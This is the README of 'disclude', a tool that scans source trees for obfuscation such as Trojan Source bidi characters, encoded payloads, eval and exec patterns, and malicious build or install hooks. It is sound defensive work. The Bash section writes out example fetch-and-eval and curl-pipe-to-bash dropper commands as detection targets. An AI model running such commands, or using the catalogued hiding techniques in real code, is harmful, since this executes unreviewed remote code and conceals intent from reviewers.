Detect obfuscation in source code packages.
disclude
Scan a source tree (C, Rust, Python, TypeScript, JavaScript, Bash/Shell) for signs that code is hiding its intent from a human reader: Unicode attacks, encoded payloads, dynamic execution patterns, and build-time escape hatches. This is not a general-purpose vulnerability scanner; it surfaces the techniques used to make malicious code look benign on review.
Implemented in fast, multi-threaded Rust. Useful for humans, useful for AI agents: find areas for examination faster (and cheaper) than full code scans.
Install
pip install disclude
Usage
disclude scan <path> [options]
| Flag | Default | Description |
|---|---|---|
| `--format` | `human` | Output format: `human`, `json`, `sarif` |
| `--severity` | `warn` | Minimum severity to report: `info`, `warn`, `critical` |
| `--exit-code` | off | Exit 1 if any findings at or above threshold |
| `--diff <ref>` | - | Annotate findings introduced since a git ref (`main`, a tag, a SHA) |
| `--lang <lang>` | `auto` | Override language detection: `python`, `rust`, `ts`, `js`, `c`, `bash`/`sh`/`shell` |
| `--ignore <file>` | - | Additional ignore file (gitignore syntax) |
| `--no-raw` | - | Skip raw byte analysis |
| `--no-token` | - | Skip token-level analysis |
| `--no-ast` | - | Skip AST analysis (faster, less precise) |
Examples
# Human-readable report, warn and above
disclude scan ./my-package
# SARIF output for GitHub Code Scanning
disclude scan ./my-package --format sarif > results.sarif
# CI gate: fail if any critical finding
disclude scan ./my-package --severity critical --exit-code
# Review only what a PR introduced
disclude scan ./my-package --diff main --exit-code
Output formats
human: coloured terminal output grouped by file.
json: newline-delimited JSON, one object per file. Suitable for further processing.
sarif: SARIF 2.1.0, compatible with GitHub Code Scanning, VS Code SARIF viewer, and most CI platforms. Every signal kind appears in the rules catalog even if no findings were produced.
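As an illustration of post-processing the `json` format, here is a minimal sketch that reads newline-delimited JSON and lists files with findings at or above a threshold. The field names `path`, `findings`, and `severity` are assumptions made for this example; the actual schema is not described in this document, so adjust them to the real output.

```python
import json

SEVERITY_ORDER = {"info": 0, "warn": 1, "critical": 2}


def parse_ndjson(text):
    """Parse newline-delimited JSON into a list of objects, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def files_at_or_above(records, threshold):
    """Return paths of files with at least one finding at or above `threshold`.

    ASSUMPTION: each record looks like
    {"path": "...", "findings": [{"severity": "warn"}, ...]}.
    These keys are hypothetical, not the tool's documented schema.
    """
    floor = SEVERITY_ORDER[threshold]
    hits = []
    for record in records:
        severities = [f.get("severity", "info") for f in record.get("findings", [])]
        if any(SEVERITY_ORDER.get(s, 0) >= floor for s in severities):
            hits.append(record.get("path"))
    return hits


# Hypothetical sample shaped like "one object per file".
SAMPLE = "\n".join([
    '{"path": "a.py", "findings": [{"severity": "critical"}]}',
    '{"path": "b.py", "findings": [{"severity": "info"}]}',
    "",
])
```

Parsing line by line keeps memory use flat on large trees, which is the usual reason to prefer newline-delimited JSON over a single array.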
Languages
Language is detected from file extension or shebang line.
| Language | Extensions | Shebang |
|---|---|---|
| Bash/Shell | `.sh`, `.bash`, `.bsh`, `.ksh`, `.zsh` | `bash`, `sh`, `ksh`, `zsh` |
| C | `.c`, `.h` | - |
| Python | `.py`, `.pyi` | `python` |
| Rust | `.rs` | - |
| TypeScript | `.ts`, `.tsx`, `.mts`, `.cts` | - |
| JavaScript | `.js`, `.jsx`, `.mjs`, `.cjs` | `node`, `deno`, `bun` |
How it works
Each file passes through up to three analysis layers. Later layers refine earlier ones. For example, a base64 blob found in a comment is demoted to info by the token pass because encoded text in comments is common and low-risk.
Raw pass → byte-level: Unicode codepoints, encoded strings, entropy, line length
Token pass → language-aware: reclassify raw findings by context (identifier / string / comment),
emit identifier anomalies and string-concat patterns
AST pass → tree-sitter: function call patterns, build scripts, install hooks
Severity levels: critical (high confidence attack signal), warn (suspicious, review recommended), info (low confidence or expected in some legitimate code).
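The way a later layer refines an earlier one can be sketched in a few lines. This is an illustrative model only: the `Finding` class and `token_pass` function are hypothetical names, and the single rule shown is the base64 demotion described above, not the tool's full rule set.

```python
from dataclasses import dataclass, replace


@dataclass(frozen=True)
class Finding:
    signal: str
    severity: str              # "info", "warn", or "critical"
    context: str = "unknown"   # lexical context, filled in by the token pass


def token_pass(finding, context):
    """Attach lexical context to a raw finding and apply a demotion rule.

    Sketch of one rule: a base64 blob found anywhere other than a
    string literal (for example in a comment) is demoted to info.
    """
    refined = replace(finding, context=context)
    if finding.signal == "encoding-base64" and context != "string":
        refined = replace(refined, severity="info")
    return refined


raw = Finding(signal="encoding-base64", severity="warn")
in_comment = token_pass(raw, "comment")
in_string = token_pass(raw, "string")
```

Here `in_comment.severity` is `"info"` while `in_string.severity` stays `"warn"`: the raw pass only knows that a blob exists, and the token pass supplies the context that decides how much it matters.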
Checks
Unicode obfuscation
These run on every file regardless of language.
| Signal | Severity | Description |
|---|---|---|
| `unicode-bidi` | critical | Bidirectional control characters (U+202A–U+202E, U+2066–U+2069). This is the Trojan Source attack class: bidi overrides make code appear to do something different from what it compiles to. |
| `unicode-zero-width` | warn | Zero-width characters (U+200B ZWSP, U+200C ZWNJ, U+200D ZWJ, U+00AD soft hyphen, U+FEFF BOM outside file start). Can silently change identifier names or inject hidden content. |
| `unicode-invisible` | warn | Characters from the Unicode Tags block (U+E0001 LANGUAGE TAG; U+E0020–U+E007F). These are invisible in all common renderers and have no legitimate use in source code. Used in IOCCC 2024 "salmon" to attach invisible suffixes to macro names, making identifiers silently different from what they appear. Demoted to info when found inside string literals or comments. |
| `unicode-mixed-script` | warn | Identifier contains characters from more than one Unicode script (e.g. Cyrillic + Latin). Demoted to info inside strings/comments. |
| `unicode-homoglyph` | warn | Identifier contains characters that are visually indistinguishable from a different ASCII character (e.g. Cyrillic а vs Latin a). Demoted to info inside strings/comments. |
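To make the codepoint ranges in the table concrete, the following sketch flags bidi controls, zero-width characters, and Tags-block characters in a string. It is a simplified illustration, not the tool's Rust implementation: `scan_unicode` is a hypothetical name, and context-based demotion (strings, comments) is left out.

```python
# Codepoint sets taken from the ranges listed in the table above.
BIDI_CONTROLS = set(range(0x202A, 0x202F)) | set(range(0x2066, 0x206A))
ZERO_WIDTH = {0x200B, 0x200C, 0x200D, 0x00AD}
BOM = 0xFEFF


def scan_unicode(text):
    """Return (index, signal) pairs for suspicious codepoints in `text`."""
    hits = []
    for index, char in enumerate(text):
        cp = ord(char)
        if cp in BIDI_CONTROLS:
            hits.append((index, "unicode-bidi"))
        elif cp in ZERO_WIDTH or (cp == BOM and index > 0):
            # A BOM is only tolerated as the very first character of the file.
            hits.append((index, "unicode-zero-width"))
        elif cp == 0xE0001 or 0xE0020 <= cp <= 0xE007F:
            hits.append((index, "unicode-invisible"))
    return hits
```

For example, `scan_unicode("na\u200bme")` returns `[(2, "unicode-zero-width")]`, while a leading BOM followed by plain ASCII produces no findings.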
Surrogate escape sequences
Applies to JavaScript and TypeScript string literals only.
| Signal | Severity | Description |
|---|---|---|
| `unicode-surrogate` | warn / info | `\uHHHH` escape sequences forming UTF-16 surrogate pairs. JavaScript runtimes recombine adjacent surrogate pairs at runtime: a pair such as `\uDB40\uDC41` evaluates to U+E0041 (TAG LATIN CAPITAL LETTER A), an invisible tag character. Warn when the decoded codepoint is a Tags block character; info for other surrogate pairs (e.g. the emoji 😀 written as `\uD83D\uDE00`) or orphaned surrogates. |
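The recombination of a surrogate pair follows the standard UTF-16 formula, which the sketch below applies. The function names are hypothetical, and the warn/info split mirrors the Tags-block rule in the table; orphaned surrogates are not handled here.

```python
def combine_surrogates(high, low):
    """Combine a UTF-16 high/low surrogate pair into one codepoint."""
    if not (0xD800 <= high <= 0xDBFF and 0xDC00 <= low <= 0xDFFF):
        raise ValueError("not a valid high/low surrogate pair")
    return 0x10000 + ((high - 0xD800) << 10) + (low - 0xDC00)


def classify_pair(high, low):
    """Return 'warn' if the pair decodes into the Tags block, else 'info'."""
    cp = combine_surrogates(high, low)
    in_tags_block = cp == 0xE0001 or 0xE0020 <= cp <= 0xE007F
    return "warn" if in_tags_block else "info"


tag_a = combine_surrogates(0xDB40, 0xDC41)   # 0xE0041, TAG LATIN CAPITAL LETTER A
grin = combine_surrogates(0xD83D, 0xDE00)    # 0x1F600, grinning face emoji
```

Decoding before classifying is what lets a scanner see through the escape: the source text contains only ASCII, but the runtime string contains an invisible character.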
Encoded payloads
These run on every file regardless of language.
| Signal | Severity | Description |
|---|---|---|
| `encoding-base64` | warn | Base64-shaped blob in a string literal. Threshold: ≥64 chars for unpadded blobs; ≥40 chars when the blob ends with `=` or `==` padding (padding is definitive proof of base64 encoding, ruling out hex digests and identifiers). Often used to embed payloads or C2 URLs that are decoded and requested at runtime. Demoted to info outside string literals. |
| `encoding-hex` | warn | Long run of `\xNN` hex escape sequences in a string literal. A common way to embed shellcode or obfuscated text. Demoted to info outside string literals. |
| `encoding-octal` | warn | Long run of `\NNN` octal escape sequences (≥6 consecutive, minimum entropy 2.5 bits/byte). Octal is less recognizable than hex and valid in C, Python, and JavaScript, where it is used to encode arbitrary bytes or hide printable characters (`\101` for `A`, `\012` for newline). Demoted to info outside string literals. |
| `encoding-escape-soup` | warn | Dense mix of arbitrary escape sequences. Indicates content that has been serialized or obfuscated to avoid plain-text grep. |
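The two base64 length thresholds can be illustrated with a small regex-based check. This is a sketch under assumptions: the regex, the function name, and the choice to count padding characters toward the length are mine, not confirmed details of the tool.

```python
import re

# A run of base64 alphabet characters with optional trailing padding.
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def looks_like_base64(literal):
    """Apply the documented length thresholds to a string literal's contents.

    ASSUMPTION: the length includes any '=' padding characters.
    """
    for match in BASE64_RUN.finditer(literal):
        blob = match.group(0)
        # Padding is strong evidence of base64, so a shorter blob qualifies.
        threshold = 40 if blob.endswith("=") else 64
        if len(blob) >= threshold:
            return True
    return False


sha1_digest = "da39a3ee5e6b4b0d3255bfef95601890afd80709"  # 40 hex chars, unpadded
```

The higher unpadded threshold is what keeps ordinary hex digests such as `sha1_digest` from firing: they fit the base64 alphabet but carry no padding and are shorter than 64 characters.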
Code structure anomalies
These run on every file regardless of language.
| Signal | Severity | Description |
|---|---|---|
| `high-complexity` | warn | String literal with unusually high Shannon entropy (high compression ratio). Raw high-entropy data in source is often an encoded payload or embedded binary. |
| `long-line` | info | Line length exceeds threshold in a file that is not a minified bundle. Lines dominated (>80%) by string/comment content are suppressed; the signal targets long code lines, which are a common obfuscation tactic. |
| `whitespace-anomaly` | warn | Unusual whitespace in indentation (e.g. mixed tabs/spaces, non-standard whitespace characters), or, for C, decorative internal whitespace layout where ≥ 30 % of lines have ≥ 2 runs of ≥ 4 spaces between code tokens. The decorative trigger catches IOCCC-style code that has been padded into rectangles, diamonds, or other visual shapes. Two structural-alignment filters suppress switch/case tables (one starting keyword dominates) and column-aligned data arrays (run-start columns cluster at a few fixed positions). |
| `narrow-file-charset` | warn | The file's entire printable non-whitespace character vocabulary fits within ≤ 12 distinct ASCII characters (minimum 200 bytes of content). JSFuck uses exactly 6 characters (`!()+[]`) to encode arbitrary JavaScript using type coercion; the resulting file has no readable identifiers, strings, or keywords. The message names the characters found. |
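A rough sketch of the `narrow-file-charset` idea, using the two numbers from the table (at most 12 distinct characters, at least 200 bytes). The function name and the decision to return nothing when a non-ASCII character is present are assumptions for illustration.

```python
def narrow_charset(source, max_distinct=12, min_bytes=200):
    """Return the sorted character vocabulary if it is suspiciously small.

    Returns None when the file is too short, is empty of visible
    characters, uses non-ASCII characters, or has a normal-sized vocabulary.
    """
    if len(source.encode("utf-8")) < min_bytes:
        return None
    vocab = {ch for ch in source if not ch.isspace()}
    # ASSUMPTION: only printable ASCII (0x21 to 0x7E) counts toward the signal.
    if not vocab or any(not (0x21 <= ord(ch) <= 0x7E) for ch in vocab):
        return None
    if len(vocab) > max_distinct:
        return None
    return "".join(sorted(vocab))


jsfuck_like = "[][(![]+[])[+[]]]" * 20
ordinary = "def handler(event):\n    return event['name'].upper()\n" * 10
```

With these inputs, `narrow_charset(jsfuck_like)` yields `"!()+[]"`, the six-character JSFuck alphabet, while `narrow_charset(ordinary)` yields `None`.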
Identifier anomalies
Token pass; language-aware.
| Signal | Severity | Description |
|---|---|---|
| `identifier-narrow-charset` | warn | Identifier composed entirely of visually confusable characters (`l`, `I`, `1`, `O`, `0`). Names like `lI1O0lI` are unreadable by design. |
| `identifier-low-length` | info | File-wide naming-shape signal. Fires when the mean non-conventional identifier length is below 2.0 over at least 20 identifiers, or when ≥ 40 % of non-conventional identifiers are exactly one character (over at least 30 identifiers). The second trigger catches IOCCC-style obfuscation where a sprinkling of long keywords (`extern`, `nanosleep`, `TIOCGWINSZ`) inflates the mean above 2.0 even though most globals and functions are single letters. |
| `string-concat-construction` | warn | String concatenation that reconstructs a sensitive identifier (`exec`, `eval`, `import`, `getattr`, `system`, `require`, etc.). A common pattern to dodge static keyword grep. |
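The two `identifier-low-length` triggers can be written out directly from the thresholds in the table. In this sketch the input is assumed to be already filtered down to "non-conventional" identifiers; how the tool decides what counts as conventional is not specified here, and the function name is hypothetical.

```python
def identifier_low_length(identifiers):
    """Evaluate the two file-wide triggers over pre-filtered identifiers.

    ASSUMPTION: `identifiers` already excludes conventional names.
    """
    count = len(identifiers)
    if count == 0:
        return False
    mean_length = sum(len(name) for name in identifiers) / count
    single_char_share = sum(1 for name in identifiers if len(name) == 1) / count

    mean_trigger = count >= 20 and mean_length < 2.0
    share_trigger = count >= 30 and single_char_share >= 0.40
    return mean_trigger or share_trigger


# 15 single letters plus 15 long names: mean length is well above 2.0,
# but half of the identifiers are one character long.
ioccc_like = ["x"] * 15 + ["nanosleep", "TIOCGWINSZ", "extern"] * 5
```

`ioccc_like` shows why the second trigger exists: the long names pull the mean above 2.0, so only the single-character share catches it.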
Dynamic execution — Python
AST pass; tree-sitter.
| Signal | Severity | Description |
|---|---|---|
| `dynamic-execution` | critical / warn | `exec()` or `eval()` called with a non-literal argument (critical), or with a literal (warn). Also fires when `compile()` is reached by a decoded value. |
| `dynamic-import` | warn | `__import__()` or `importlib.import_module()` called with a non-literal specifier. |
| `dynamic-attribute` | warn | `getattr(obj, name)` where `name` is not a string literal (runtime-resolved attribute lookup). |
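The literal versus non-literal distinction for `exec()` and `eval()` can be demonstrated with Python's standard `ast` module. Note the substitution: the tool itself uses tree-sitter, so this is an analogous sketch rather than its implementation, and it covers only direct calls by bare name.

```python
import ast


def find_dynamic_execution(source):
    """Return sorted (line, function, severity) tuples for exec/eval calls.

    The source is only parsed, never executed.
    """
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        if not (isinstance(node.func, ast.Name) and node.func.id in {"exec", "eval"}):
            continue
        if not node.args:
            continue
        first = node.args[0]
        is_literal = isinstance(first, ast.Constant) and isinstance(first.value, str)
        findings.append((node.lineno, node.func.id, "warn" if is_literal else "critical"))
    return sorted(findings)


SAMPLE = 'eval("1 + 1")\nexec(payload)\nprint("eval")\n'
```

Working on the syntax tree rather than on text is what keeps `print("eval")` from matching: the string mentions `eval` but nothing calls it.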
Dynamic execution — TypeScript / JavaScript
AST pass; tree-sitter.
| Signal | Severity | Description |
|---|---|---|
| `dynamic-execution` | critical / warn / info | `eval()`, `new Function()`, or `setTimeout`/`setInterval` called with a string argument (critical/warn). `atob(x)`, base64 decode at runtime (warn), is the first step of the classic supply-chain pattern: store a C2 URL or payload as a base64 literal, decode it, then fetch or exec. `btoa(x)`, base64 encode at runtime (info), is used in exfiltration patterns. |
| `dynamic-import` | warn | `require(expr)` where `expr` is not a string literal, or an `` import(`...${expr}...`) `` template. |
| `dynamic-attribute` | warn | `process.binding(name)`: Node.js internal binding escape hatch that reaches C++ internals not exposed through the public API. |
Dynamic execution — Bash/Shell
AST pass; tree-sitter.
| Signal | Severity | Description |
|---|---|---|
| `dynamic-execution` | critical / warn | `eval` called with a dynamic argument: variable expansion (`eval "$VAR"`), command substitution (`eval $(cmd)`), or a word containing variable references (critical). `eval` called with a plain string literal (warn). Also fires when `exec` is called with a variable as the binary path (`exec $cmd`), since the executed binary is unknown statically (critical). |
| `dynamic-import` | warn | `source $path` or `. $path` where the path contains a variable, so the sourced file is determined at runtime. |
| `dynamic-execution` (pipeline) | warn | A pipeline ending with `bash`, `sh`, `ksh`, or `zsh`: the classic "pipe to shell" dropper pattern (`curl … \| bash`). Downloads and immediately executes arbitrary code without inspection. |
Examples:
# CRITICAL — dynamic value reaches eval
PAYLOAD=$(curl -s https://example.com/update.sh)
eval "$PAYLOAD"
# CRITICAL — exec with variable binary path
exec $USER_SUPPLIED_BIN
# WARN — source with variable path
source $CONFIG_DIR/init.sh
# WARN — classic pipe-to-shell dropper
curl -fsSL https://example.com/install.sh | bash
Dynamic execution — C
AST pass; tree-sitter.
| Signal | Severity | Description |
|---|---|---|
| `dynamic-execution` | critical / warn | `system(cmd)` or `exec*(path, ...)` (`execl`, `execlp`, `execle`, `execv`, `execvp`, `execve`) or `popen(cmd, mode)`. Critical when the argument is a variable; warn when it is a string literal. |
| `dynamic-import` | warn | `dlopen(path, flags)` with a non-literal path, which dynamically loads a shared library. |
| `dynamic-attribute` | warn | `dlsym(handle, name)` with a non-literal symbol name, which resolves a function pointer by name at runtime. |
C-specific obfuscation
| Signal | Severity | Description |
|---|---|---|
| `macro-alias` | warn | Token pass. `#define <name> <replacement>` where the macro name is 1–2 characters and the replacement is a sensitive identifier (`write`, `read`, `open`, `system`, `exec*`, `popen`, `fork`, `kill`, `ptrace`, `syscall`, `dlopen`, `dlsym`, `mmap`, `mprotect`, `socket`, `connect`, `send`, `recv`, …). A common dropper trick: the syscall is renamed to a single letter so that simple keyword grep over the source misses it. Function-like macros and multi-token bodies are excluded. |
| `macro-keyword-override` | warn | Token pass. `#define <keyword> <body>` where `<keyword>` is a reserved pre-C11 keyword (`int`, `char`, `double`, `union`, `for`, `return`, …) and the replacement body is non-empty. Rebinding a keyword silently changes what every later occurrence in the file means, an IOCCC favourite (`#define double(a,b) int`, `#define union static struct`). C11+ pseudo-keywords (`_Static_assert`, `_Generic`, `_Atomic`, `_Alignas`, `_Alignof`, `_Thread_local`, `_Noreturn`) are excluded because real codebases routinely polyfill them. Empty-body shims (`#define inline`) are excluded. |
| `identifier-confusable-collision` | warn | Token pass. Two distinct identifiers in the same file collapse to the same visual skeleton after grouping confusable characters: round-O `0`/`O`/`o` and vertical-stroke `1`/`l`/`I` (lowercase `i` is excluded; its dot makes it visually distinct). Fires only when at least one position differs as digit-vs-letter (`_0` vs `_O`, `x0` vs `xO`); pure case-pair collisions like `Object`/`object` are excluded as a common C convention rather than the IOCCC digit-letter swap. |
| `numeric-literal-payload` | critical | AST pass. A wide-numeric array (≥ 8 elements of `short`, `int`, `long`, `long long`, `float`, `double`, `long double`, `wchar_t`, `size_t`, `int16_t`/`int32_t`/`int64_t`, `uint16_t`/`uint32_t`/`uint64_t`, `intptr_t`, `uintptr_t`, …) that is later reinterpreted through a byte-pointer cast (`char *`, `unsigned char *`, `signed char *`, `int8_t *`, `uint8_t *`). Hides arbitrary bytes inside what looks like a table of floating-point or integer constants. Findings are deduped per array: one report per array, citing the cast count. |
| `format-string-write` | critical | Token pass. printf-family format string contains a `%n` write directive (`%n`, `%hhn`, `%hn`, `%ln`, `%lln`, with optional positional `%<digit>$…n`). The `n` conversion writes the byte-count-so-far into an `int *` argument, a memory write primitive seen almost exclusively in CTF/exploit code and IOCCC entries. Detected inside string literals and inside `#define` macro bodies (catches the IOCCC stringification trick `#define N(a) "%"#a"$hhn"`, where the `$hhn` directive tail is split across stringification). Comments mentioning `%n` are excluded, both standalone and embedded `/* ... */` or `// ...` inside `#define` lines. |
| `legacy-k-and-r-main` | warn | AST pass. `main()` defined without an explicit return type, in pre-ANSI K&R style (`main() { ... }` or `main(argc, argv) int argc; char **argv; { ... }`). Modern C requires `int main(...)`; the implicit-int form was removed from the language in C99 and is a strong indicator of intentionally archaic source (IOCCC entries) or pre-1989 code. |
| `implicit-int-function` | warn | AST pass. Three or more functions in the same file are defined without an explicit return type (pre-ANSI K&R implicit-int). Catches IOCCC sources where every function is shaped `Q(a){return a;}`. The single-function `main()` form is reported by `legacy-k-and-r-main`; this signal is the file-wide pattern. |
| `dynamic-format-string` | warn | AST pass. A printf-family call (`printf`, `fprintf`, `dprintf`, `sprintf`, `snprintf`, `asprintf`, and the `w`-wide variants) uses a non-literal format string, the classic format-string-bug shape. The `v*` variadic forwarders are excluded by design. Bare-identifier format args that resolve to a parameter or local variable of the enclosing function are excluded (legitimate format selection). `SCREAMING_SNAKE_CASE` names are treated as macro-defined formats and excluded, as are i18n wrappers (`_(...)`, `gettext(...)`, `dgettext`, `ngettext`, …). |
| `embedded-nul-in-string` | warn | Token pass. A C string literal contains an embedded NUL escape (`\0`, `\00`, `\000`, `\x00`) followed by additional non-whitespace bytes. libc string functions truncate at the NUL while the trailing bytes remain accessible through `memcpy`/length-bearing APIs. This is a stealth payload pattern, and an IOCCC technique for stuffing extra data into a string that still looks short. |
| `reverse-subscript-notation` | warn | AST pass. Two shapes of the C `a[b]` ≡ `b[a]` trick: (1) a `subscript_expression` whose left operand is a numeric literal (`2[arr]` instead of `arr[2]`), caught directly when the surrounding parse is clean; (2) a `#define <name> [<expr>]` macro whose body is a bare bracketed fragment, used to splice a reverse subscript at every call site (`#define q [v+a]` → `2 q` ⇒ `2[v+a]`). Real code essentially never indexes a pointer with the integer on the left. Subscripts inside `ERROR` parser-recovery contexts are excluded. |
| `recursive-main-call` | warn | AST pass. `main` is called from inside another function in the same TU. Recursion through `main` is an IOCCC pattern (a loop using `argc`/`argv` to thread state); the runtime is the only legitimate caller of `main`. The K&R `main() { ... }` definition shape (where tree-sitter wraps the bare signature in an `ERROR` containing a `call_expression`) is excluded so the implicit-int `main` definition isn't misread as a self-call. |
| `stringify-dereference` | warn | AST pass. A function-like macro body contains `*#param`: the `#` operator stringifies the macro argument into a string literal, and the leading `*` dereferences it to extract the first byte. A one-character literal extraction trick used in IOCCC code (e.g. `*c == *#v` to compare a runtime char against the first letter of a macro-arg token). Token paste `##` is excluded. |
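The skeleton comparison behind `identifier-confusable-collision` can be sketched as follows. This is an illustrative reading of the rule in the table, with hypothetical function names; the tool's actual grouping tables may differ.

```python
from itertools import combinations

ROUND = set("0Oo")    # round-O group
STROKE = set("1lI")   # vertical-stroke group (lowercase i deliberately excluded)


def skeleton(name):
    """Collapse each confusable character to one representative per group."""
    return "".join("O" if ch in ROUND else "l" if ch in STROKE else ch for ch in name)


def has_digit_letter_swap(a, b):
    """True if some position holds a digit in one name and a letter in the other."""
    return any(x != y and x.isdigit() != y.isdigit() for x, y in zip(a, b))


def confusable_collisions(identifiers):
    """Return pairs that share a skeleton and differ by a digit-vs-letter swap."""
    pairs = []
    for a, b in combinations(sorted(set(identifiers)), 2):
        if skeleton(a) == skeleton(b) and has_digit_letter_swap(a, b):
            pairs.append((a, b))
    return pairs


names = ["_0", "_O", "Object", "object", "x0", "xO", "count"]
```

For `names`, the result is `[("_0", "_O"), ("x0", "xO")]`. `Object` and `object` share a skeleton too, but they differ only by case, so the digit-vs-letter requirement filters them out.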
Build-time and install-time
AST pass; language-specific.
| Signal | Severity | Description |
|---|---|---|
| `build-script-shellout` | critical | Rust `build.rs` spawns a shell command or makes a network request at compile time. Malicious build scripts are a known supply-chain vector because they run automatically during `cargo build`. Also elevated to critical when found alongside unsafe code in the same file. |
| `proc-macro-presence` | info | Rust crate defines a procedural macro (`proc-macro = true`). Proc-macros run arbitrary code at compile time with full access to the compiler. Informational: legitimate proc-macros are common, but they warrant extra scrutiny in untrusted dependencies. |
| `install-hook-shellout` | warn | `package.json` `preinstall`/`postinstall`/`install` script shells out to a non-trivial command. Runs automatically on `npm install`. |
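As a small illustration of where install hooks live, this sketch extracts the three lifecycle scripts from a `package.json` document. It only lists them; deciding what counts as a "non-trivial command" is the tool's job and is not modelled here. The function name and the sample manifest are hypothetical.

```python
import json

INSTALL_HOOKS = ("preinstall", "install", "postinstall")


def install_hooks(package_json_text):
    """Return the install-time lifecycle scripts declared in a package.json."""
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts", {})
    return {hook: scripts[hook] for hook in INSTALL_HOOKS if hook in scripts}


# Hypothetical manifest used only for demonstration.
SAMPLE_MANIFEST = json.dumps({
    "name": "example-package",
    "scripts": {
        "test": "jest",
        "postinstall": "node ./setup.js",
    },
})
```

`install_hooks(SAMPLE_MANIFEST)` returns only the `postinstall` entry; the `test` script is ignored because npm does not run it during installation.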
What is New
1.2.0
Updates to the public interface.
1.1.0
Updates to the public interface.
1.0.0
Initial release.